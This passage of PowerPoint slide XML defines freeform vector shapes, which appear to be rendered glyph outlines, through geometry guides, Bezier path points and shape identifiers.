                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBD9E8A-24A0-476A-928A-013342139FB7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2933700" y="1131888"/>
              <a:ext cx="20638" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 55 w 55"/>
                <a:gd name="T1" fmla="*/ 27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4 h 212"/>
                <a:gd name="T8" fmla="*/ 55 w 55"/>
                <a:gd name="T9" fmla="*/ 27 h 212"/>
                <a:gd name="T10" fmla="*/ 55 w 55"/>
                <a:gd name="T11" fmla="*/ 185 h 212"/>
                <a:gd name="T12" fmla="*/ 28 w 55"/>
                <a:gd name="T13" fmla="*/ 158 h 212"/>
                <a:gd name="T14" fmla="*/ 0 w 55"/>
                <a:gd name="T15" fmla="*/ 184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8"/>
                    <a:pt x="28" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="158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4" y="212"/>
                    <a:pt x="55" y="198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6" name="Freeform 1102">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2889155-E7CF-448A-BF43-4560192C60E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3197225" y="1095375"/>
              <a:ext cx="90488" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 199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9 h 308"/>
                <a:gd name="T28" fmla="*/ 210 w 235"/>
                <a:gd name="T29" fmla="*/ 199 h 308"/>
                <a:gd name="T30" fmla="*/ 133 w 235"/>
                <a:gd name="T31" fmla="*/ 287 h 308"/>
                <a:gd name="T32" fmla="*/ 69 w 235"/>
                <a:gd name="T33" fmla="*/ 212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9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5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9"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="210" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="252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2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="174"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="141"/>
                    <a:pt x="102" y="111"/>
                    <a:pt x="137" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="111"/>
                    <a:pt x="210" y="151"/>
                    <a:pt x="210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7" name="Freeform 1103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624BCB0D-00B7-41BE-8527-4D8C6756C57B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3303587" y="1093788"/>
              <a:ext cx="74613" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 194"/>
                <a:gd name="T1" fmla="*/ 26 h 308"/>
                <a:gd name="T2" fmla="*/ 149 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 308"/>
                <a:gd name="T4" fmla="*/ 74 w 194"/>
                <a:gd name="T5" fmla="*/ 64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7 h 308"/>
                <a:gd name="T44" fmla="*/ 159 w 194"/>
                <a:gd name="T45" fmla="*/ 21 h 308"/>
                <a:gd name="T46" fmla="*/ 176 w 194"/>
                <a:gd name="T47" fmla="*/ 44 h 308"/>
                <a:gd name="T48" fmla="*/ 194 w 194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6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2"/>
                    <a:pt x="74" y="64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7"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="22"/>
                    <a:pt x="136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4" y="37"/>
                    <a:pt x="19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8" name="Freeform 1104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5214D823-2C80-494F-A37E-FCED5B54F8D8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3403600" y="1093788"/>
              <a:ext cx="73025" cy="1206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9" name="Freeform 1105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39D6084-5FD6-4995-B71D-DEEAB507C53A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3503612" y="1093788"/>
              <a:ext cx="74613" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 194"/>
                <a:gd name="T1" fmla="*/ 26 h 308"/>
                <a:gd name="T2" fmla="*/ 149 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 308"/>
                <a:gd name="T4" fmla="*/ 74 w 194"/>
                <a:gd name="T5" fmla="*/ 64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7 h 308"/>
                <a:gd name="T44" fmla="*/ 159 w 194"/>
                <a:gd name="T45" fmla="*/ 21 h 308"/>
                <a:gd name="T46" fmla="*/ 176 w 194"/>
                <a:gd name="T47" fmla="*/ 44 h 308"/>
                <a:gd name="T48" fmla="*/ 194 w 194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6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2"/>
                    <a:pt x="74" y="64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7"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="22"/>
                    <a:pt x="136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4" y="37"/>
                    <a:pt x="19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0" name="Freeform 1106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A65667BA-1536-4D3B-8340-151883393F77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3603625" y="1093788"/>
              <a:ext cx="74613" cy="1206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1" name="Freeform 1107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC24330-7614-4A0B-B4DC-B02ADE379E30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3703637" y="1093788"/>
              <a:ext cx="82550" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 225 h 315"/>
                <a:gd name="T2" fmla="*/ 151 w 215"/>
                <a:gd name="T3" fmla="*/ 144 h 315"/>
                <a:gd name="T4" fmla="*/ 200 w 215"/>
                <a:gd name="T5" fmla="*/ 67 h 315"/>
                <a:gd name="T6" fmla="*/ 108 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 315"/>
                <a:gd name="T8" fmla="*/ 15 w 215"/>
                <a:gd name="T9" fmla="*/ 55 h 315"/>
                <a:gd name="T10" fmla="*/ 33 w 215"/>
                <a:gd name="T11" fmla="*/ 74 h 315"/>
                <a:gd name="T12" fmla="*/ 51 w 215"/>
                <a:gd name="T13" fmla="*/ 56 h 315"/>
                <a:gd name="T14" fmla="*/ 44 w 215"/>
                <a:gd name="T15" fmla="*/ 42 h 315"/>
                <a:gd name="T16" fmla="*/ 109 w 215"/>
                <a:gd name="T17" fmla="*/ 21 h 315"/>
                <a:gd name="T18" fmla="*/ 174 w 215"/>
                <a:gd name="T19" fmla="*/ 68 h 315"/>
                <a:gd name="T20" fmla="*/ 151 w 215"/>
                <a:gd name="T21" fmla="*/ 116 h 315"/>
                <a:gd name="T22" fmla="*/ 100 w 215"/>
                <a:gd name="T23" fmla="*/ 133 h 315"/>
                <a:gd name="T24" fmla="*/ 68 w 215"/>
                <a:gd name="T25" fmla="*/ 145 h 315"/>
                <a:gd name="T26" fmla="*/ 83 w 215"/>
                <a:gd name="T27" fmla="*/ 156 h 315"/>
                <a:gd name="T28" fmla="*/ 107 w 215"/>
                <a:gd name="T29" fmla="*/ 156 h 315"/>
                <a:gd name="T30" fmla="*/ 189 w 215"/>
                <a:gd name="T31" fmla="*/ 225 h 315"/>
                <a:gd name="T32" fmla="*/ 109 w 215"/>
                <a:gd name="T33" fmla="*/ 294 h 315"/>
                <a:gd name="T34" fmla="*/ 28 w 215"/>
                <a:gd name="T35" fmla="*/ 259 h 315"/>
                <a:gd name="T36" fmla="*/ 36 w 215"/>
                <a:gd name="T37" fmla="*/ 244 h 315"/>
                <a:gd name="T38" fmla="*/ 18 w 215"/>
                <a:gd name="T39" fmla="*/ 226 h 315"/>
                <a:gd name="T40" fmla="*/ 0 w 215"/>
                <a:gd name="T41" fmla="*/ 245 h 315"/>
                <a:gd name="T42" fmla="*/ 109 w 215"/>
                <a:gd name="T43" fmla="*/ 315 h 315"/>
                <a:gd name="T44" fmla="*/ 215 w 215"/>
                <a:gd name="T45" fmla="*/ 22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315">
                  <a:moveTo>
                    <a:pt x="215" y="225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="191"/>
                    <a:pt x="192" y="162"/>
                    <a:pt x="151" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="121"/>
                    <a:pt x="200" y="94"/>
                    <a:pt x="200" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="31"/>
                    <a:pt x="164" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="21"/>
                    <a:pt x="15" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="68"/>
                    <a:pt x="25" y="74"/>
                    <a:pt x="33" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="74"/>
                    <a:pt x="51" y="67"/>
                    <a:pt x="51" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="51"/>
                    <a:pt x="49" y="47"/>
                    <a:pt x="44" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="21"/>
                    <a:pt x="104" y="21"/>
                    <a:pt x="109" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="21"/>
                    <a:pt x="174" y="42"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="104"/>
                    <a:pt x="151" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="131"/>
                    <a:pt x="120" y="132"/>
                    <a:pt x="100" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="135"/>
                    <a:pt x="68" y="135"/>
                    <a:pt x="68" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="156"/>
                    <a:pt x="77" y="156"/>
                    <a:pt x="83" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="156"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="156"/>
                    <a:pt x="189" y="193"/>
                    <a:pt x="189" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="259"/>
                    <a:pt x="159" y="294"/>
                    <a:pt x="109" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="294"/>
                    <a:pt x="45" y="287"/>
                    <a:pt x="28" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="254"/>
                    <a:pt x="36" y="251"/>
                    <a:pt x="36" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="234"/>
                    <a:pt x="28" y="226"/>
                    <a:pt x="18" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="226"/>
                    <a:pt x="0" y="232"/>
                    <a:pt x="0" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="288"/>
                    <a:pt x="49" y="315"/>
                    <a:pt x="109" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="315"/>
                    <a:pt x="215" y="271"/>
                    <a:pt x="215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2" name="Freeform 1108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10278638-C839-4758-A518-98BB37E3826E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3805237" y="1093788"/>
              <a:ext cx="79375" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 208"/>
                <a:gd name="T1" fmla="*/ 158 h 315"/>
                <a:gd name="T2" fmla="*/ 104 w 208"/>
                <a:gd name="T3" fmla="*/ 0 h 315"/>
                <a:gd name="T4" fmla="*/ 0 w 208"/>
                <a:gd name="T5" fmla="*/ 157 h 315"/>
                <a:gd name="T6" fmla="*/ 104 w 208"/>
                <a:gd name="T7" fmla="*/ 315 h 315"/>
                <a:gd name="T8" fmla="*/ 208 w 208"/>
                <a:gd name="T9" fmla="*/ 158 h 315"/>
                <a:gd name="T10" fmla="*/ 183 w 208"/>
                <a:gd name="T11" fmla="*/ 152 h 315"/>
                <a:gd name="T12" fmla="*/ 104 w 208"/>
                <a:gd name="T13" fmla="*/ 294 h 315"/>
                <a:gd name="T14" fmla="*/ 25 w 208"/>
                <a:gd name="T15" fmla="*/ 152 h 315"/>
                <a:gd name="T16" fmla="*/ 104 w 208"/>
                <a:gd name="T17" fmla="*/ 21 h 315"/>
                <a:gd name="T18" fmla="*/ 183 w 208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5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50"/>
                    <a:pt x="49" y="315"/>
                    <a:pt x="104" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="315"/>
                    <a:pt x="208" y="248"/>
                    <a:pt x="208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2" y="294"/>
                    <a:pt x="25" y="232"/>
                    <a:pt x="25" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="73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3" name="Freeform 1109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067FC7EE-02EF-4F0F-BF71-E888C8F1DBA7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3900487" y="1093788"/>
              <a:ext cx="88900" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 231 w 231"/>
                <a:gd name="T1" fmla="*/ 214 h 311"/>
                <a:gd name="T2" fmla="*/ 215 w 231"/>
                <a:gd name="T3" fmla="*/ 203 h 311"/>
                <a:gd name="T4" fmla="*/ 170 w 231"/>
                <a:gd name="T5" fmla="*/ 203 h 311"/>
                <a:gd name="T6" fmla="*/ 170 w 231"/>
                <a:gd name="T7" fmla="*/ 16 h 311"/>
                <a:gd name="T8" fmla="*/ 153 w 231"/>
                <a:gd name="T9" fmla="*/ 0 h 311"/>
                <a:gd name="T10" fmla="*/ 140 w 231"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 122 w 231"/>
                <a:gd name="T13" fmla="*/ 9 h 311"/>
                <a:gd name="T14" fmla="*/ 2 w 231"/>
                <a:gd name="T15" fmla="*/ 196 h 311"/>
                <a:gd name="T16" fmla="*/ 0 w 231"/>
                <a:gd name="T17" fmla="*/ 208 h 311"/>
                <a:gd name="T18" fmla="*/ 16 w 231"/>
                <a:gd name="T19" fmla="*/ 224 h 311"/>
                <a:gd name="T20" fmla="*/ 151 w 231"/>
                <a:gd name="T21" fmla="*/ 224 h 311"/>
                <a:gd name="T22" fmla="*/ 151 w 231"/>
                <a:gd name="T23" fmla="*/ 290 h 311"/>
                <a:gd name="T24" fmla="*/ 114 w 231"/>
                <a:gd name="T25" fmla="*/ 290 h 311"/>
                <a:gd name="T26" fmla="*/ 99 w 231"/>
                <a:gd name="T27" fmla="*/ 300 h 311"/>
                <a:gd name="T28" fmla="*/ 114 w 231"/>
                <a:gd name="T29" fmla="*/ 311 h 311"/>
                <a:gd name="T30" fmla="*/ 207 w 231"/>
                <a:gd name="T31" fmla="*/ 311 h 311"/>
                <a:gd name="T32" fmla="*/ 222 w 231"/>
                <a:gd name="T33" fmla="*/ 300 h 311"/>
                <a:gd name="T34" fmla="*/ 207 w 231"/>
                <a:gd name="T35" fmla="*/ 290 h 311"/>
                <a:gd name="T36" fmla="*/ 170 w 231"/>
                <a:gd name="T37" fmla="*/ 290 h 311"/>
                <a:gd name="T38" fmla="*/ 170 w 231"/>
                <a:gd name="T39" fmla="*/ 224 h 311"/>
                <a:gd name="T40" fmla="*/ 215 w 231"/>
                <a:gd name="T41" fmla="*/ 224 h 311"/>
                <a:gd name="T42" fmla="*/ 231 w 231"/>
                <a:gd name="T43" fmla="*/ 214 h 311"/>
                <a:gd name="T44" fmla="*/ 151 w 231"/>
                <a:gd name="T45" fmla="*/ 203 h 311"/>
                <a:gd name="T46" fmla="*/ 22 w 231"/>
                <a:gd name="T47" fmla="*/ 203 h 311"/>
                <a:gd name="T48" fmla="*/ 138 w 231"/>
                <a:gd name="T49" fmla="*/ 21 h 311"/>
                <a:gd name="T50" fmla="*/ 151 w 231"/>
                <a:gd name="T51" fmla="*/ 21 h 311"/>
                <a:gd name="T52" fmla="*/ 151 w 231"/>
                <a:gd name="T53" fmla="*/ 20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311">
                  <a:moveTo>
                    <a:pt x="231" y="214"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="203"/>
                    <a:pt x="221" y="203"/>
                    <a:pt x="215" y="203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="3"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="140" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="128" y="0"/>
                    <a:pt x="122" y="9"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="200"/>
                    <a:pt x="0" y="202"/>
                    <a:pt x="0" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="221"/>
                    <a:pt x="4" y="224"/>
                    <a:pt x="16" y="224"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="290"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="290"/>
                    <a:pt x="99" y="290"/>
                    <a:pt x="99" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="311"/>
                    <a:pt x="109" y="311"/>
                    <a:pt x="114" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207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3" y="290"/>
                    <a:pt x="207" y="290"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="170" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="224"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="224"/>
                    <a:pt x="231" y="224"/>
                    <a:pt x="231" y="214"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="203"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="20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4" name="Freeform 1110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352BED04-9065-4776-B19D-1289F418DA53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497012" y="1328738"/>
              <a:ext cx="87313" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 230 w 230"/>
                <a:gd name="T1" fmla="*/ 155 h 305"/>
                <a:gd name="T2" fmla="*/ 122 w 230"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 16 w 230"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 230"/>
                <a:gd name="T7" fmla="*/ 11 h 305"/>
                <a:gd name="T8" fmla="*/ 16 w 230"/>
                <a:gd name="T9" fmla="*/ 21 h 305"/>
                <a:gd name="T10" fmla="*/ 32 w 230"/>
                <a:gd name="T11" fmla="*/ 21 h 305"/>
                <a:gd name="T12" fmla="*/ 32 w 230"/>
                <a:gd name="T13" fmla="*/ 284 h 305"/>
                <a:gd name="T14" fmla="*/ 16 w 230"/>
                <a:gd name="T15" fmla="*/ 284 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 230"/>
                <a:gd name="T17" fmla="*/ 294 h 305"/>
                <a:gd name="T18" fmla="*/ 16 w 230"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 122 w 230"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 230 w 230"/>
                <a:gd name="T23" fmla="*/ 155 h 305"/>
                <a:gd name="T24" fmla="*/ 205 w 230"/>
                <a:gd name="T25" fmla="*/ 155 h 305"/>
                <a:gd name="T26" fmla="*/ 112 w 230"/>
                <a:gd name="T27" fmla="*/ 284 h 305"/>
                <a:gd name="T28" fmla="*/ 58 w 230"/>
                <a:gd name="T29" fmla="*/ 284 h 305"/>
                <a:gd name="T30" fmla="*/ 58 w 230"/>
                <a:gd name="T31" fmla="*/ 21 h 305"/>
                <a:gd name="T32" fmla="*/ 112 w 230"/>
                <a:gd name="T33" fmla="*/ 21 h 305"/>
                <a:gd name="T34" fmla="*/ 205 w 230"/>
                <a:gd name="T35" fmla="*/ 15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0" h="305">
                  <a:moveTo>
                    <a:pt x="230" y="155"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="75"/>
                    <a:pt x="188" y="0"/>
                    <a:pt x="122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2" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32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122" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="305"/>
                    <a:pt x="230" y="234"/>
                    <a:pt x="230" y="155"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="155"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="218"/>
                    <a:pt x="172" y="284"/>
                    <a:pt x="112" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="21"/>
                    <a:pt x="205" y="92"/>
                    <a:pt x="205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5" name="Freeform 1111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B2D6C8-9489-4283-A2B5-321DD7A25753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601787" y="136207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4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6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4 w 232"/>
                <a:gd name="T31" fmla="*/ 153 h 220"/>
                <a:gd name="T32" fmla="*/ 131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4 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 220"/>
                <a:gd name="T40" fmla="*/ 154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6" name="Freeform 1112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90D0438-DAE9-41F4-96A9-B1AACCA2B502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1698625" y="1339850"/>
              <a:ext cx="79375" cy="107950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3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49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3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7" name="Freeform 1113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B01DF07-2CAC-4468-861A-9262E8754E16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801812" y="136207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4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6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4 w 232"/>
                <a:gd name="T31" fmla="*/ 153 h 220"/>
                <a:gd name="T32" fmla="*/ 131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4 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 220"/>
                <a:gd name="T40" fmla="*/ 154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8" name="Freeform 1114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E704D62-615D-4251-B733-1B5D32198CAF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2001837" y="136207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4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6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9" name="Freeform 1115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028C0D02-48AC-4A4D-82F2-5CFA7C2DA523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2098675" y="1339850"/>
              <a:ext cx="79375" cy="107950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1 w 209"/>
                <a:gd name="T9" fmla="*/ 213 h 279"/>
                <a:gd name="T10" fmla="*/ 91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1 w 209"/>
                <a:gd name="T19" fmla="*/ 64 h 279"/>
                <a:gd name="T20" fmla="*/ 91 w 209"/>
                <a:gd name="T21" fmla="*/ 16 h 279"/>
                <a:gd name="T22" fmla="*/ 79 w 209"/>
                <a:gd name="T23" fmla="*/ 0 h 279"/>
                <a:gd name="T24" fmla="*/ 66 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 279"/>
                <a:gd name="T26" fmla="*/ 66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6 w 209"/>
                <a:gd name="T35" fmla="*/ 85 h 279"/>
                <a:gd name="T36" fmla="*/ 66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0" name="Freeform 1116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CE2DD6-70EA-4937-92A1-0DDBBF1020DC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298700" y="1339850"/>
              <a:ext cx="80963" cy="107950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1 w 209"/>
                <a:gd name="T9" fmla="*/ 213 h 279"/>
                <a:gd name="T10" fmla="*/ 91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1 w 209"/>
                <a:gd name="T19" fmla="*/ 64 h 279"/>
                <a:gd name="T20" fmla="*/ 91 w 209"/>
                <a:gd name="T21" fmla="*/ 16 h 279"/>
                <a:gd name="T22" fmla="*/ 79 w 209"/>
                <a:gd name="T23" fmla="*/ 0 h 279"/>
                <a:gd name="T24" fmla="*/ 66 w 209"/>
                <a:gd name="T25" fmla="*/ 16 h 279"/>
                <a:gd name="T26" fmla="*/ 66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6 w 209"/>
                <a:gd name="T35" fmla="*/ 85 h 279"/>
                <a:gd name="T36" fmla="*/ 66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1" name="Freeform 1117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58CE78B3-915B-4342-8A91-84345C1533DC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2403475" y="136207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6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2" name="Freeform 1118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED91629-6028-4BE3-B4B5-DCF4D3728832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500312" y="1363663"/>
              <a:ext cx="85725" cy="84138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3" name="Freeform 1119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12671254-21E3-43FD-BC35-4AC95E4ED811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600325" y="1362075"/>
              <a:ext cx="90488" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 237 w 237"/>
                <a:gd name="T1" fmla="*/ 23 h 336"/>
                <a:gd name="T2" fmla="*/ 205 w 237"/>
                <a:gd name="T3" fmla="*/ 0 h 336"/>
                <a:gd name="T4" fmla="*/ 150 w 237"/>
                <a:gd name="T5" fmla="*/ 19 h 336"/>
                <a:gd name="T6" fmla="*/ 100 w 237"/>
                <a:gd name="T7" fmla="*/ 3 h 336"/>
                <a:gd name="T8" fmla="*/ 20 w 237"/>
                <a:gd name="T9" fmla="*/ 80 h 336"/>
                <a:gd name="T10" fmla="*/ 38 w 237"/>
                <a:gd name="T11" fmla="*/ 129 h 336"/>
                <a:gd name="T12" fmla="*/ 26 w 237"/>
                <a:gd name="T13" fmla="*/ 164 h 336"/>
                <a:gd name="T14" fmla="*/ 41 w 237"/>
                <a:gd name="T15" fmla="*/ 203 h 336"/>
                <a:gd name="T16" fmla="*/ 0 w 237"/>
                <a:gd name="T17" fmla="*/ 265 h 336"/>
                <a:gd name="T18" fmla="*/ 115 w 237"/>
                <a:gd name="T19" fmla="*/ 336 h 336"/>
                <a:gd name="T20" fmla="*/ 230 w 237"/>
                <a:gd name="T21" fmla="*/ 265 h 336"/>
                <a:gd name="T22" fmla="*/ 197 w 237"/>
                <a:gd name="T23" fmla="*/ 211 h 336"/>
                <a:gd name="T24" fmla="*/ 125 w 237"/>
